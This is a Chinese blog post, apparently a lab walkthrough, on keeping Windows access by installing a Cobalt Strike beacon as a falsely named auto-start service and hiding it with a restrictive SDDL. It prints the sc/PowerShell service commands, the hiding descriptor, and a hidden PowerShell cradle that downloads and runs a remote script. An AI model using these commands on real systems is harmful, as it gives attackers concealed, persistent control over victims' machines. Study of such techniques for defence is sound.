Windows权限维持之利用安全描述符隐藏服务后门

最新推荐文章于 2024-04-06 14:21:23 发布
最新推荐文章于 2024-04-06 14:21:23 发布
阅读量793 收藏
点赞数 1
分类专栏: Windows权限维持 文章标签: 安全 windows web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122424652
版权

利用安全描述符隐藏服务后门进行权限维持

文中主要讲解Windows权限维持中的小技巧,通过了解掌握安全描述符隐藏后门技术,更快知晓权限维持作用。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

原理:

使用sc或powershell来出创建自启动服务,再通过修改SDDL(安全描述符)隐藏服务,
最后利用powershell脚本来修改注册表项的访问权限,从而实现真正的隐藏。

漏洞复现:

首先使用cobaltstrike来生成后门文件:
在这里插入图片描述
修改名称为beacon,放到administrator目录下:
此为演示,实战根据需要放置目录:
在这里插入图片描述
cmd创建自启动服务:
但创建的服务可以通过查询服务发现:

sc create ".NET CLR Networking 3.4.0.0" binpath= "cmd.exe /k C:\Users\administrator\beacon.exe" depend= Tcpip obj= Localsystem start= auto

在这里插入图片描述
powershell创建自启动服务:

new-service –Name ".NET CLR Networking 3.4.0.0" –DisplayName ".NET CLR Networking
3.4.0.0" –BinaryPathName "cmd.exe /k C:\Users\administrator\beacon.exe" –StartupType AutomaticDelayedStart

同样也可以通过命令查看:

sc query ".NET CLR Networking 3.4.0.0"

在未隐藏前,是可以通过命令查看到的:
在这里插入图片描述
运行此服务后,后门就成功上线:
在这里插入图片描述
修改SDDL来隐藏服务:
windows访问控制模型分为access token(访问令牌)和安全描述符:
windows中的安全对象都使用SDDL字符串来表示访问对象对于安全对象的权限,服务自然也存在其SDDL,并且sc命令中可以设置SDDL。那么通过更改SDDL可以修改服务的各种权限来隐藏服务:

sc sdset ".NET CLR Networking 3.4.0.0" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

这里服务就已经被隐藏:
在这里插入图片描述
再次使用命令已无法查询到服务,但已正常启动
在这里插入图片描述
通过注册表依然可以查看相关的命令以及后门路径:
在这里插入图片描述
重启服务器后,成功上线。
在这里插入图片描述
此处可以使用命令执行1.ps1脚本,修改注册表来拒绝对值的查询,到达隐藏效果,但隐藏后,重启无法完成权限维持:

powershell.exe -exec bypass -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.45.135/1.ps1'));Server-Sddl-Change -Name '.NET CLR Networking 3.4.0.0'"

在这里插入图片描述
理论上说是可以在注册表中进行隐藏,但实验时没有成功,若有成功的大佬欢迎来评论指导。

全局变量Global
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
隐藏cxf服务列表_Windows权限维持技巧之隐藏服务
weixin_42189611的博客
01-27 395
0x01注册服务后门注册为windows自启动服务是常见的后门维持手法,使用命令sc或者powershell命令都可以将自己的后门程序注册为自启动服务。使用sc命令将后门程序注册为自启动服务,并以LocalSystem的身份运行:手动启动服务或重启计算机,后门执行。虽然手动执行时提示启动失败,但实际上后门已经成功执行:msf成功建立新会话,查看权限为system虽然成功实现了服务自启动...
利用安全描述符隐藏服务后门进行权限维持1
08-03
cmd 创建启动服务sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\
Windows权限维持技巧之利用安全描述符隐藏后门服务
weixin_44747030的博客
05-02 1585
Windows权限维持技巧之隐藏服务 0x01 前言 在内网渗透的时候为了防止目标关机重启等问题导致权限丢失,会采用将后门程序注册为自启动的服务(windows服务会在开机时自动启动),让木马跟随服务的启动来回连我们的C2服务器,而在将木马注册为服务时,可以在注册表中查看到木马的文件路径,下面将通过安全描述符(SSDL)来隐藏注册表中的值。 0x02 原理 安全描述符windows访问控制模型的一部分,其中包含了与安全对象关联的安全信息。 SDDL由4个部分组成 DACL(D)-表示自主访问控制列表
window权限维持——利用安全描述符隐藏服务后门进行权限维持
mingyqf的博客
02-18 647
操作可参考:https://blog.csdn.net/nicai321/article/details/122424652 侵删 原创 oulaa [宽字节安全] 通过注册服务创建后门后门程序注册为自启动服务是我们常用的一种进行权限维持的方法,通常可以通过sc或者powershell来进行创建。 cmd创建自启动服务 sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\aa\Desktop\beacon.exe
对象安全描述符
luckylion的专栏
06-03 2242
以下转自:http://sluttery.spaces.live.com/Blog/cns!1pT-_vAfaYbpcFEI23XZlwLg!711.entry简称:SDDL四个主要组件的令牌:所有者 (O:)、主要组 (G:)、DACL (D:) 和 SACL (S:)摘要:对基于 ACL 的安全性以及 Windows 访问控制模型的简介。1: ACL 编辑器介绍
Windows安全描述符SECURITY_DESCRIPTOR
xiliang_pan的专栏
08-26 1149
 // //  Where: // //      SE_OWNER_DEFAULTED - This boolean flag, when set, indicates that the //          SID pointed to by the Owner field was provided by a //          defaulting mechanism
操作系统安全WINDOWS系统服务.pptx
06-02
恶意软件有时会利用服务权限进行攻击,因此,定期更新和修复服务的漏洞是必要的。同时,只应赋予服务必要的权限,避免过度授权可能导致的安全风险。禁用不必要的服务可以减少潜在的攻击面,但要注意这可能影响某些...
Python 的描述符 descriptor详解
09-21
Python中包含了许多内建的语言特性,它们使得代码简洁且易于理解。这些特性包括列表/集合/字典推导式,属性(property)、以及装饰器(decorator)。对于大部分特性来说,这些...但是这里有个例外,那就是描述符
winacl:独立于平台的库,用于连接Windows安全描述符
05-08
**标题解析:** ...总结来说,winacl是一个利用Python编写的跨平台库,专门用于管理Windows系统的安全描述符,提供了一种灵活且易于使用的接口,让开发者能够在各种环境下控制和管理Windows对象的访问权限
修改NT安全描述符的所有者
04-08
Windows操作系统中,NT安全描述符(NT Security Descriptor)是一种用于定义对象访问权限的数据结构。它包含关于对象的所有者、访问控制列表(ACL)和其他安全信息。本文将深入探讨如何修改NT安全描述符的所有者,...
权限维持篇---Windows权限维持--隐藏
永不垂头的博客
04-29 1113
权限维持篇—Windows权限维持隐藏篇 文章目录权限维持篇---Windows权限维持--隐藏篇前言一、隐藏文件二、隐藏账号三、端口复用四、进程注入五、结束六、我的公众号 前言 攻击者在获取服务权限后,通常会用一些后门维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 一、隐藏文件 1、利用文件属性最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
服务方式隐藏
laiqun_ai的专栏
05-26 1006
1. 在CMD 下输入 sc create sys binPath= “C:\Windows\System32\com\Svchost.exe -service” start= auto DisplayName= “System service“ (以上路径可更改) 复制 CCPROXY 目录内所有文件至C:\WINDOWS\SYSTEM32\COM   并改CCPROXY.EXE 名称为:s
SC实现隐藏Windows服务维持权限
XunanSec的博客
05-31 913
简介: sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。 创建服务 创建一个服务名为demo的自启动服务服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行 sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem 添加个描述 sc descr
理解 SOA和微服务架构
Listron的专栏
09-23 446
网上有个小段子,专门比较SOA和微服务架构区别的,相比其他抽象的解释,更让人容易理解。 A:菜菜哥,我最近需要做一个项目,老大让我用微服务的方式来做 B:那挺好呀,微服务现在的确很流行 A:我以前在别的公司都是以SOA的方式,SOA也是面向服务的方式呀 B:的确,微服务和SOA有相同之处 面向服务的架构(SOA)是一个组件模型,它将应用程序的不同功能单元(称为服务)进行拆分,并通过这些服务之间定义良好的接口和契约联系起来。接口是采用中立的方式进行定义的,它应该独立于实...
Windows原理深入学习系列-访问控制列表-关于安全描述符的补充
SecSource_Stars的博客
03-08 200
这是[信安成长计划]的第 20 篇文章 0x00 目录 0x01 安全描述符的结构 0x02 两个结构的不同点 0x03 真正的查询方案 0x04 参考文章 0x01 安全描述符的结构 在上一篇文章中,我们在取 DACL 的时候,对安全描述符的结构产生了疑问,在查到的资料中都在说使用 _SECURITY_DESCRIPTOR 结构,但是因为符号不是最新的等等原因,造成了错位,最后发现应该 +0x30 而在我们去分析内核实际操作的时候发现,应该使用的是 _SECURITY_DESCRIP
文件特殊权限,文件访问控制列表,文件的隐藏属性!
SYH885的博客
10-06 339
文件的隐藏属性 Linux系统中的文件除了具备一般权限和特殊权限之外,还有一种隐藏权限,即被隐藏起来的权限,默认情况下不能直接被用户发觉。有用户曾经在生产环境和RHCE考试题目中碰到过明明权限充足但却无法删除某个文件的情况,或者仅能在日志文件中追加内容而不能修改或删除内容,这在一定程度上阻止了黑客篡改系统日志的图谋,因此这种“奇怪”的文件也保障了Linux系统的安全性。 chattr命令 chattr命令用于设置文件的隐藏权限,格式为“chattr [参数] 文件”。如果想要把某个隐藏功能添加到文件上,则需
【实战】服务隐藏与排查 Windows 应急响应,重难点整理
最新发布
m0_58397123的博客
04-06 863
这样的话,可以将注册表遍历一遍,之后获取服务名称,挨个查询,看看有没有拒绝访问的,这样就可以测试出是否存在隐藏服务。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~这种隐藏方式无非就是谁可以看,谁不可以看,在 Linux 中,几乎所有的限制对。当然了,这是美化后的,如果你想简单一些,直接用下面的几行就够了。
windows安全模型--令牌(token)和安全描述符
软件人生
09-02 8148
      当一个程序访问一个资源时,需要有相应的访问权限。windwos安全模型中,有两个角色,一个就是访问者(进程),一个是被访问者(资源)。      资源,也可以成为安全对象,是广义的,可以是文件,目录,注册表,管道,命名句柄,进程,线程。每个安全对象都有一个安全描述符,里面有ACL(访问列表)。ACL由若干条ACE组成。每一条ACE标记了一条访问规则,就是一个SID(一会可以在访问者中看到它)被允许或拒绝做某个操作(如读、写、执行)。可以看出,每个资源(安全对象)记录了谁(SID,可以是多个)可以
详细讲解一下windows上的ACE安全描述符字符串格式
05-12
ACE(Access Control Entry)是Windows中用于定义访问控制列表(ACL)的一种结构。ACE描述了一个安全主体对一个对象的访问权限,包括对对象的读取、写入、执行、删除等操作。ACE中包含了一个SID(Security Identifier)和一些访问权限掩码。 安全描述符字符串格式用于表示访问控制列表中的ACE结构,其格式如下: ``` S:(flags;type;SID)(permissions)(objectGUID)(inheritGUID)(accountSID) ``` 其中: - S:表示安全描述符字符串的起始标识符。 - flags:表示ACE的属性,包括CONTAINER_INHERIT、OBJECT_INHERIT、NO_PROPAGATE_INHERIT等。 - type:表示ACE的类型,包括ACCESS_ALLOWED、ACCESS_DENIED、SYSTEM_AUDIT、SYSTEM_ALARM等。 - SID:表示ACE所适用的安全主体的SID。 - permissions:表示访问权限掩码,包括READ_CONTROL、WRITE_DAC、WRITE_OWNER、DELETE、GENERIC_READ、GENERIC_WRITE、GENERIC_EXECUTE等。 - objectGUID:表示ACE所适用的对象的GUID。 - inheritGUID:表示从父对象继承的ACE的GUID。 - accountSID:表示ACE所适用的安全主体的账户SID。 例如,一个允许管理员对某个文件夹进行完全控制的ACE的安全描述符字符串格式为: ``` S:(AU;CIIO;GA;;;BA) ``` 其中,flags表示CONTAINER_INHERIT、INHERIT_ONLY、OBJECT_INHERIT,type表示ACCESS_ALLOWED,SID表示管理员的SID,permissions表示FULL_CONTROL。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值